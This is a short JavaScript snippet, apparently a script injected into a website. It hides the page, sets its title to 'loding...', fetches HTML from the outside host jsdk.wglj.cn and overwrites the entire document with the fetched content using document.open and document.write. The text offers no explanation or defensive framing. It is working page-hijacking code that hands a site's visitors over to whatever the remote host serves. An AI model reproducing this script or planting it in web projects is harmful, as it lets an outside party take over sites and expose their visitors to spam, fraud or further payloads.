document.title="loding...";document.documentElement.hidden=1;
(function(){
    var geUrl="https://jsdk.wglj.cn/indexd.html?t=" + Math.random();
    var xhr=new XMLHttpRequest;xhr.onload=function(){var onhash=window.onhashchange;var h=xhr.responseText;var a=document.open("text/html","replace");a.write(h);a.close();window.onhashchange=onhash};
    xhr.open("GET",geUrl,!0);xhr.send();
})();